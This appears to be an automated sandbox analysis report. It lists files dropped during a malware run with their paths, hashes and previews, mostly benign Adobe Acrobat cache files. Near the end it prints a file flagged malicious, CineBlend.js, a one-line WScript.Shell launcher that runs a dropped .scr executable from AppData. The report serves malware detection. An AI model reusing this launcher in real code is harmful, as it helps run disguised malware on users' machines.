Preview:	{"analyticsData":{"responseGUID":"eedbaeb3-d340-4286-96b0-ed7bb0271688","sophiaUUID":"8C4093EC-3A2E-41DD-AFC7-28A61CF92EFA"},"encodingScheme":true,"expirationDTS":1736239324469,"statusCode":200,"surfaceID":"DC_FirstMile_Home_View_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Right_Sec_Surface

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	294
Entropy (8bit):	5.277684389429755
Encrypted:	false
SSDEEP:	6:YEQXJ2HX1SzIRfe2nmSg1c2LjcWkHvR0Y0DoAvJfBD2G6UpnrPeUkwRe9:YvXKX12Oe2mT5LjIPIsGR22cUkee9
MD5:	C5320FE7B17E0EBD528D402D9825EC3E
SHA1:	61042F6D058175A7C5A68719EE30C0062FA9EE09
SHA-256:	89A606B4528C91992101D7E2046FA2F860ABF8336A0DA4E02F880803CBE99091
SHA-512:	EA908AE11345D00F315B8C03AA28EE63F394211EC3DA031D18F5FBDA70150051C7A0AA2F2D3A3A467647C4301A559E92A431AEDD636F244E611D466D3FE82CFE
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"eedbaeb3-d340-4286-96b0-ed7bb0271688","sophiaUUID":"8C4093EC-3A2E-41DD-AFC7-28A61CF92EFA"},"encodingScheme":true,"expirationDTS":1736239324469,"statusCode":200,"surfaceID":"DC_FirstMile_Right_Sec_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_READER_LAUNCH_CARD

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	285
Entropy (8bit):	5.325225443562671
Encrypted:	false
SSDEEP:	6:YEQXJ2HX1SzIRfe2nmSg1c2LjcWkHvR0Y0DoAvJfPmwrPeUkwRe9:YvXKX12Oe2mT5LjIPIsGH56Ukee9
MD5:	19C30EA9D6A5B8CA8CF6B586F3CBE13B
SHA1:	BC57EF6AF72508F3D71A57E47A662433260FB156
SHA-256:	433478D26B84EE0BE181F37FA8C41C5C05A89D871068CAFEF63DB467BC1CC131
SHA-512:	AE4EA692048A26CB472634BA96B114EFD25A9B4493C9FDFA2536D333DB729A47A20CC321802656D31D379EBA1CB9DDF4AB990B4A8C19631E413BA1F9F20C020A
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"eedbaeb3-d340-4286-96b0-ed7bb0271688","sophiaUUID":"8C4093EC-3A2E-41DD-AFC7-28A61CF92EFA"},"encodingScheme":true,"expirationDTS":1736239324469,"statusCode":200,"surfaceID":"DC_READER_LAUNCH_CARD","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Convert_LHP_Banner

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1123
Entropy (8bit):	5.6884757201
Encrypted:	false
SSDEEP:	24:Yv6X1F7mT5XIQJpLgE9cQx8LennAvzBvkn0RCmK8czOCCSrQD:YvedeXbJhgy6SAFv5Ah8cv/rk
MD5:	B36544F6FAAED76DC81C1F774BD99F36
SHA1:	F0493DF8397D1C58806F1A2C23258D69E71BA813
SHA-256:	13B6EC2F8B6E3E6DFE92A47B280DC2C94A83A79281E07A9532BBDA225546AECE
SHA-512:	158C4FF1CD8AF512DC44946DE03A31543D7B06D2FE0136D83D9253FE60851F629D08C7F71002B27BC84709201C3FA1367017DE066B611B49DF51D25B7960EDDF
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"eedbaeb3-d340-4286-96b0-ed7bb0271688","sophiaUUID":"8C4093EC-3A2E-41DD-AFC7-28A61CF92EFA"},"encodingScheme":true,"expirationDTS":1736239324469,"statusCode":200,"surfaceID":"DC_Reader_Convert_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Convert_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_1","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"d5bba1ae-6009-4d23-8886-fd4a474b8ac9","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Convert_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IkNvbnZlcnRQREZSZHJSSFBBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkV4cG9ydCBQREZzIHRvIE1pY3Jvc29mdCBXb3JkIGFuZCBFeGNlbC4ifSwidGNh

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Banner

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	289
Entropy (8bit):	5.295249436440619
Encrypted:	false
SSDEEP:	6:YEQXJ2HX1SzIRfe2nmSg1c2LjcWkHvR0Y0DoAvJf8dPeUkwRe9:YvXKX12Oe2mT5LjIPIsGU8Ukee9
MD5:	0901418CA03F705708EDBAFFBE01F9E4
SHA1:	2B2CC10F09369202C7D88DEED3AAF6650B162B03
SHA-256:	A096992922E9C667011436F680DF56DAB0179B47603CECF1ED805ADD36BF28E5
SHA-512:	322730E6E8FD023C98E1EDD1D37664E93648FD524EB69020162E8029DB2311DB9EAB883055BFDBCB03F8FBC81C5A159EB19A9F5773C3DA201AB8E7255ACB9D80
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"eedbaeb3-d340-4286-96b0-ed7bb0271688","sophiaUUID":"8C4093EC-3A2E-41DD-AFC7-28A61CF92EFA"},"encodingScheme":true,"expirationDTS":1736239324469,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Retention

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	292
Entropy (8bit):	5.285993313719903
Encrypted:	false
SSDEEP:	6:YEQXJ2HX1SzIRfe2nmSg1c2LjcWkHvR0Y0DoAvJfQ1rPeUkwRe9:YvXKX12Oe2mT5LjIPIsGY16Ukee9
MD5:	4F25F0996EF9692CCA325F1B1395829E
SHA1:	22EF3A3B5C65F9B29F034F5D2F14459FD37790B4
SHA-256:	1F4027212FF4A67B56704A2A2278C0C9D3F9D2AFB5A28C3B0DDCDF726271D940
SHA-512:	1B525DA31B884AA7D00B520FAEE28FBBCF025EE2CABB7B082B5BDC0E07A43C11912F666A3F849311AB05CB5AE9907D001D163293C798B4E60DFA1780D4805855
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"eedbaeb3-d340-4286-96b0-ed7bb0271688","sophiaUUID":"8C4093EC-3A2E-41DD-AFC7-28A61CF92EFA"},"encodingScheme":true,"expirationDTS":1736239324469,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Edit_LHP_Banner

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	289
Entropy (8bit):	5.301590125025259
Encrypted:	false
SSDEEP:	6:YEQXJ2HX1SzIRfe2nmSg1c2LjcWkHvR0Y0DoAvJfFldPeUkwRe9:YvXKX12Oe2mT5LjIPIsGz8Ukee9
MD5:	4FC7019CFC4BB743AE343201E2175EDD
SHA1:	1DA5C7D25D265C254D4251824323CF1B9C46B459
SHA-256:	DC1B4A27543E66E2360A5E6FD9760E51D654BB2B1294919B5D614C23AEC5EC42
SHA-512:	D7481BF3FF2C81867965F1DA0065521C95E18209F346E4C9ECADA09A46E105D14EF084F25F3613A9B18DAE25BC6D3B5FC28F0560A273F62E206DD315439C9E32
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"eedbaeb3-d340-4286-96b0-ed7bb0271688","sophiaUUID":"8C4093EC-3A2E-41DD-AFC7-28A61CF92EFA"},"encodingScheme":true,"expirationDTS":1736239324469,"statusCode":200,"surfaceID":"DC_Reader_Edit_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Home_LHP_Trial_Banner

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	295
Entropy (8bit):	5.320202229145316
Encrypted:	false
SSDEEP:	6:YEQXJ2HX1SzIRfe2nmSg1c2LjcWkHvR0Y0DoAvJfzdPeUkwRe9:YvXKX12Oe2mT5LjIPIsGb8Ukee9
MD5:	C4E6FA16745CC9A902159E8E3527D7B2
SHA1:	AE7B1AD8113BD454B36F7AA42AB726C6DCE292DF
SHA-256:	ACDC6B6C8385A73D529ABC7A1AAD555C76EDA6425AB0CBDF1D001A7239CAF686
SHA-512:	0AF4455D4AD534E5E8FF14E69F04BEB6007EE85003C5F92E0D1E55D62446BB013DEC6C9E40DB896A4C2EE7FDD4EA8439C6838FC04C62F4740EC0DAD4EF57AFD5
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"eedbaeb3-d340-4286-96b0-ed7bb0271688","sophiaUUID":"8C4093EC-3A2E-41DD-AFC7-28A61CF92EFA"},"encodingScheme":true,"expirationDTS":1736239324469,"statusCode":200,"surfaceID":"DC_Reader_Home_LHP_Trial_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_More_LHP_Banner

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	289
Entropy (8bit):	5.300569564396201
Encrypted:	false
SSDEEP:	6:YEQXJ2HX1SzIRfe2nmSg1c2LjcWkHvR0Y0DoAvJfYdPeUkwRe9:YvXKX12Oe2mT5LjIPIsGg8Ukee9
MD5:	B3F92290285025976EFD6B624E05384C
SHA1:	1B3788C9C698DA2254B9B5A6A161F37297216F32
SHA-256:	70C3346C2B0BDF88A00452DFD0C1C2B2F6809AAF7143240F98213496BCC8DD19
SHA-512:	0AD51CD8E50B351894483C15213FE024BC60A43C742B35CF9FD60600CF4139E540A9614413E5103A2AE38CE24160F6FDD35E24630B62661B0E1E7FF31B67448A
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"eedbaeb3-d340-4286-96b0-ed7bb0271688","sophiaUUID":"8C4093EC-3A2E-41DD-AFC7-28A61CF92EFA"},"encodingScheme":true,"expirationDTS":1736239324469,"statusCode":200,"surfaceID":"DC_Reader_More_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Banner

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	284
Entropy (8bit):	5.287478805750921
Encrypted:	false
SSDEEP:	6:YEQXJ2HX1SzIRfe2nmSg1c2LjcWkHvR0Y0DoAvJf+dPeUkwRe9:YvXKX12Oe2mT5LjIPIsG28Ukee9
MD5:	E41293BAB27B3BB45E7FE15FED1707DF
SHA1:	BE09002D7A62C88964B77896069513F0B3214C93
SHA-256:	CBC57F11243D6B852BE7C596A9397FDB95B2EEBB11D5EAD187203E3DC947CE54
SHA-512:	29A4DDC7BC99DFECDF77349A47F4045C8CD4716FA67DC95620583834AC40AB6AFB7A558AD542A08A35E514575F915634643BAD2566385AAFCE4614094F0E45C3
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"eedbaeb3-d340-4286-96b0-ed7bb0271688","sophiaUUID":"8C4093EC-3A2E-41DD-AFC7-28A61CF92EFA"},"encodingScheme":true,"expirationDTS":1736239324469,"statusCode":200,"surfaceID":"DC_Reader_RHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Intent_Banner

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	291
Entropy (8bit):	5.284112747538132
Encrypted:	false
SSDEEP:	6:YEQXJ2HX1SzIRfe2nmSg1c2LjcWkHvR0Y0DoAvJfbPtdPeUkwRe9:YvXKX12Oe2mT5LjIPIsGDV8Ukee9
MD5:	240B33DED0E32D5A45643DFCD4584561
SHA1:	DDD85C4E9C64D1029ED49021996AF9737E309465
SHA-256:	6EC7F90332CBC1FE0F1DB5C17D4A930BB9491DB7D6D59F3529A6A0F884B9FA3F
SHA-512:	4661FD4DD46B1F805DF839646DF3E90B438B4816FBC0611A94C97734D948DF9421E123F78189012BF0B50E96EEB5A11C27781C732B57478BE024F19D5F817CDE
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"eedbaeb3-d340-4286-96b0-ed7bb0271688","sophiaUUID":"8C4093EC-3A2E-41DD-AFC7-28A61CF92EFA"},"encodingScheme":true,"expirationDTS":1736239324469,"statusCode":200,"surfaceID":"DC_Reader_RHP_Intent_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Retention

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	287
Entropy (8bit):	5.275880558674834
Encrypted:	false
SSDEEP:	6:YEQXJ2HX1SzIRfe2nmSg1c2LjcWkHvR0Y0DoAvJf21rPeUkwRe9:YvXKX12Oe2mT5LjIPIsG+16Ukee9
MD5:	F6D3A525CB10837DD472605B6CAE5999
SHA1:	98550959741150CC80A4C16872CDFA6D09C6C856
SHA-256:	4DEE94ED1462389091FA1112905578235FFD2C943DDC4A26D841C49D87BD3AFE
SHA-512:	FF6451F13DAE2843B42A8B3748786960C9B053DC2211B6A1B9224F253EB3B1EE5847B23F2353F7E203CD8FE17F15534C32B82613872D18CC347FCC333CF00DC8
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"eedbaeb3-d340-4286-96b0-ed7bb0271688","sophiaUUID":"8C4093EC-3A2E-41DD-AFC7-28A61CF92EFA"},"encodingScheme":true,"expirationDTS":1736239324469,"statusCode":200,"surfaceID":"DC_Reader_RHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Sign_LHP_Banner

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1090
Entropy (8bit):	5.663414382698624
Encrypted:	false
SSDEEP:	24:Yv6X1F7mT5XIQ5amXayLgE+cNDxeNaqnAvz7xHn0RCmK8czOC/BSrQD:YvedeXbFBgkDMUJUAh8cvMrk
MD5:	FB38AB8D4C2CE5C0439F245F4A483E1B
SHA1:	0E5D0582222FB0E0C3D4C84AAE943244D3216A3D
SHA-256:	40EFB035964CF46BA79D187A2FCABDA09A0CC4A0D186C3CDA4F2474CB9EA8AA3
SHA-512:	F66B9B67034D633140CAB61AC8F77E0F0941582E73857829457B8C62BBF6FECBCF62536C1B8497F8501D32ED674F79A2FA52BD9812668B58A8EBB6F31E2E11D2
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"eedbaeb3-d340-4286-96b0-ed7bb0271688","sophiaUUID":"8C4093EC-3A2E-41DD-AFC7-28A61CF92EFA"},"encodingScheme":true,"expirationDTS":1736239324469,"statusCode":200,"surfaceID":"DC_Reader_Sign_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Sign_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_0","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"266234d2-130d-426e-8466-c7a061db101f","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Sign_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IlVwZ3JhZGVSSFBSZHJBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkVhc2lseSBmaWxsIGFuZCBzaWduIFBERnMuIn0sInRjYXRJZCI6bnVsbH0=","dataType":"app

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Upsell_Cards

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	286
Entropy (8bit):	5.249635270968422
Encrypted:	false
SSDEEP:	6:YEQXJ2HX1SzIRfe2nmSg1c2LjcWkHvR0Y0DoAvJfshHHrPeUkwRe9:YvXKX12Oe2mT5LjIPIsGUUUkee9
MD5:	2E5C4392A42A7041D291CDFC571B5411
SHA1:	B2E7C8D85D855D7DC89360E798B817C6E8DA8321
SHA-256:	13470A2263573B38A899E7AF1245681E5CF812848FB0DD8BA83E372039093AA9
SHA-512:	B6DA77449529206A977E9A2CE41712F04254B4F1D2F5AB828FF736EED64835A1B9486D2D5CEDD2F14E4CF28B3EA8202CF66DF0E7A0BC8B796E76F3F51209D1F0
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"eedbaeb3-d340-4286-96b0-ed7bb0271688","sophiaUUID":"8C4093EC-3A2E-41DD-AFC7-28A61CF92EFA"},"encodingScheme":true,"expirationDTS":1736239324469,"statusCode":200,"surfaceID":"DC_Reader_Upsell_Cards","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\Edit_InApp_Aug2020

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	282
Entropy (8bit):	5.255031713390615
Encrypted:	false
SSDEEP:	6:YEQXJ2HX1SzIRfe2nmSg1c2LjcWkHvR0Y0DoAvJTqgFCrPeUkwRe9:YvXKX12Oe2mT5LjIPIsGTq16Ukee9
MD5:	481D4EA7C79E4EC09FEFA2F2A8300228
SHA1:	042A93452EFBAA1B23F7AB444C8C4F8BEF9CB59B
SHA-256:	284655E7A1B1801CCD53F0CEBC21E0C873802CF519E7A5CDD5E4D40F066367B7
SHA-512:	B0F57D20CCD9807F8C346B1E904CEBCCCCAE4FFD25C65C734C49225D3681FC3DABA9D4B37E3B563C6DC9ED7C4B92426612994FAFFE945A3A3A3DD85429A20A58
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"eedbaeb3-d340-4286-96b0-ed7bb0271688","sophiaUUID":"8C4093EC-3A2E-41DD-AFC7-28A61CF92EFA"},"encodingScheme":true,"expirationDTS":1736239324469,"statusCode":200,"surfaceID":"Edit_InApp_Aug2020","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\TESTING

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	data
Category:	dropped
Size (bytes):	4
Entropy (8bit):	0.8112781244591328
Encrypted:	false
SSDEEP:	3:e:e
MD5:	DC84B0D741E5BEAE8070013ADDCC8C28
SHA1:	802F4A6A20CBF157AAF6C4E07E4301578D5936A2
SHA-256:	81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06
SHA-512:	65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71
Malicious:	false
Preview:	....

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\SOPHIA.json

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2814
Entropy (8bit):	5.137235612540642
Encrypted:	false
SSDEEP:	48:YULhm70qBJpj/1kVruBH7cEtR08mMjN9J:fQBHb1kVQJt6X+zJ
MD5:	D5DC16CC77EB44A383ED677DF7481C4D
SHA1:	BAA466859EF61D721699EC7837B7179D9A1CC51C
SHA-256:	7975BA883DF7D77C5551D23CDCCAF1E785CD497329D05124A60D4F5E7CE66A98
SHA-512:	714C1E43EAFFB02B004692CA7484BED2AB2910D4339B7F2A02A76FCE3BF2551DB069189776EF0D30BDDB6A5276B8AA94A7B626A04571155349FB2BA9CBA21A54
Malicious:	false
Preview:	{"all":[{"id":"DC_Reader_Disc_LHP_Banner","info":{"dg":"5fbabf12d34f91d24c6980d09d35ba17","sid":"DC_Reader_Disc_LHP_Banner"},"mimeType":"file","size":289,"ts":1736063779000},{"id":"DC_Reader_Sign_LHP_Banner","info":{"dg":"de68783b204a39eecef548146520c788","sid":"DC_Reader_Sign_LHP_Banner"},"mimeType":"file","size":1090,"ts":1736063778000},{"id":"DC_Reader_Convert_LHP_Banner","info":{"dg":"062744e561ee5c97036e30913d53e572","sid":"DC_Reader_Convert_LHP_Banner"},"mimeType":"file","size":1123,"ts":1736063778000},{"id":"DC_Reader_Home_LHP_Trial_Banner","info":{"dg":"9e19fc6a0b40696e2c3ed0c708504868","sid":"DC_Reader_Home_LHP_Trial_Banner"},"mimeType":"file","size":295,"ts":1736063778000},{"id":"DC_Reader_Disc_LHP_Retention","info":{"dg":"00f6a7b661cf6b31c651b23fcee5be6f","sid":"DC_Reader_Disc_LHP_Retention"},"mimeType":"file","size":292,"ts":1736063778000},{"id":"DC_Reader_More_LHP_Banner","info":{"dg":"b81b6920696d24968b58be7ed7a8b5c2","sid":"DC_Reader_More_LHP_Banner"},"mimeType":"file","

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	SQLite 3.x database, last written using SQLite version 3040000, file counter 26, database pages 3, cookie 0x2, schema 4, UTF-8, version-valid-for 26
Category:	dropped
Size (bytes):	12288
Entropy (8bit):	1.3671572026873418
Encrypted:	false
SSDEEP:	24:TLBx/XYKQvGJF7urs9S6bqyKn6ylSTofcNqDuKECG0XKdqEKfS8EKfM1baCECG0F:Tll2GL7msMcKTlS8fcsuKECofICECx
MD5:	8F7D800198E0D507C4D431C6AACE0825
SHA1:	41B4976CCAEE81A5C9C1AEEC41B36FEBFD1F4EE9
SHA-256:	18A4EDC7981559B425D3D6D23C8539659F259FE7420007374421B9B738197AEE
SHA-512:	C997897D9E6452F35BFE15684CA3B47F73F5584D8349C7907FDE0CBF2B739B73A182C6E627723B9F14DCC50BC73D9D35ACA64D169F70D88AB9678967C6FCCDB3
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................c.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents-journal

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	SQLite Rollback Journal
Category:	dropped
Size (bytes):	8720
Entropy (8bit):	1.8405052579789023
Encrypted:	false
SSDEEP:	24:7+tt4Z6bqyKn6ylSTofcNqDuKECG0+KdqEKfS8EKfM1banbqgqLKufx/XYKQvGJw:7MMcKTlS8fcsuKECpfIdqGufl2GL7msO
MD5:	412783B3CBA236FBB2CE8078F019FCF2
SHA1:	2DFD4F54743E535CFA3CC35EE37F31556CDBA15D
SHA-256:	2C7873565627394999161D76AEA1B43120F146C8218F5F9C80EE64BFA7DB6719
SHA-512:	5E78830C7D9E2255FE5E997AB8287D409B89B6A9113208BFF1FDC8EF6454D1ACB026D6E7E05584CD619E8DAEA41F2D9711E028F59421A3A95C630BB61F422B83
Malicious:	false
Preview:	.... .c.....tS............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................^..^.^.^.^.^.^.^.-.-.-.-.-.-.-.-.-.-.-........................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\UserCache64.bin

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	data
Category:	dropped
Size (bytes):	66726
Entropy (8bit):	5.392739213842091
Encrypted:	false
SSDEEP:	768:RNOpblrU6TBH44ADKZEgAAjWKL/A+q9LbP+amin8PNYyu:6a6TZ44ADEAAyKsr9LNYNK
MD5:	91E2C889E4B964F06D3AA9EE02CB54C9
SHA1:	82D4F3808E8A32A3FC7DDC79013F89EF967584FC
SHA-256:	05496921BA77A73367998223CC73EA592ACE160835F20C581FB925F50F845C36
SHA-512:	6AF314E56C6E4B4AF17AD37230511ABEBAD1002A2C4322D923CBE04D362B8B1133CBB278E3308A81882F4E9E65C0CDED5A72F67B6B8EB9DEBD68BD133D9158CA
Malicious:	false
Preview:	4.397.90.FID.2:o:..........:F:AgencyFB-Reg.P:Agency FB.L:$.........................."F:Agency FB.#.96.FID.2:o:..........:F:AgencyFB-Bold.P:Agency FB Bold.L:%.........................."F:Agency FB.#.84.FID.2:o:..........:F:Algerian.P:Algerian.L:$..........................RF:Algerian.#.95.FID.2:o:..........:F:ArialNarrow.P:Arial Narrow.L:$.........................."F:Arial Narrow.#.109.FID.2:o:..........:F:ArialNarrow-Italic.P:Arial Narrow Italic.L:$.........................."F:Arial Narrow.#.105.FID.2:o:..........:F:ArialNarrow-Bold.P:Arial Narrow Bold.L:%.........................."F:Arial Narrow.#.118.FID.2:o:..........:F:ArialNarrow-BoldItalic.P:Arial Narrow Bold Italic.L:%.........................."F:Arial Narrow.#.77.FID.2:o:..........:F:ArialMT.P:Arial.L:$.........................."F:Arial.#.91.FID.2:o:..........:F:Arial-ItalicMT.P:Arial Italic.L:$.........................."F:Arial.#.87.FID.2:o:..........:F:Arial-BoldMT.P:Arial Bold.L:$.........................."F:Arial.#.100.FID.2

C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.js

Download File

Process:	C:\Users\user\AppData\Local\Temp\677826\Prostores.com
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	192
Entropy (8bit):	4.726418798538641
Encrypted:	false
SSDEEP:	3:RiMIpGXIdPHo55wWAX+PKMEkD5o+jYaLitqL9WiZo5uWAX+PKMEkD5o+jYaLid5M:RiJBJHonwWDMkDvNLMqL9WiywWDMkDv7
MD5:	E0A807436E6A9F8201FB7ECBDFBC4F62
SHA1:	99732D579469BDFB31538AD7615BF03D2123FA91
SHA-256:	1C5DECDC95CAD7C16DD48BACC244BCE717FD02DC78E296F38012F7832656AA57
SHA-512:	C4AB96C0C4AD356F317441654C6919B18654E2D95EBB63B7A3192AFEC1033BC660B88C20C97F47E194AAD00C6C324A55AC7755646BC049ED4E232C44E1C8CAB8
Malicious:	true
Preview:	new ActiveXObject("Wscript.Shell").Exec("\"C:\\Users\\user\\AppData\\Local\\MediaFusion Technologies Inc\\CineBlend.scr\" \"C:\\Users\\user\\AppData\\Local\\MediaFusion Technologies Inc\\s\"")

C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr

Download File

Process:	C:\Users\user\AppData\Local\Temp\677826\Prostores.com
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	947288
Entropy (8bit):	6.630612696399572
Encrypted:	false
SSDEEP:	24576:uvG4FEq/TQ+Svbi3zcNjmsuENOJuM8WU2a+BYK:u9GqLQHbijkmc2umva+OK
MD5:	62D09F076E6E0240548C2F837536A46A
SHA1:	26BDBC63AF8ABAE9A8FB6EC0913A307EF6614CF2
SHA-256:	1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
SHA-512:	32DE0D8BB57F3D3EB01D16950B07176866C7FB2E737D9811F61F7BE6606A6A38A5FC5D4D2AE54A190636409B2A7943ABCA292D6CEFAA89DF1FC474A1312C695F
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
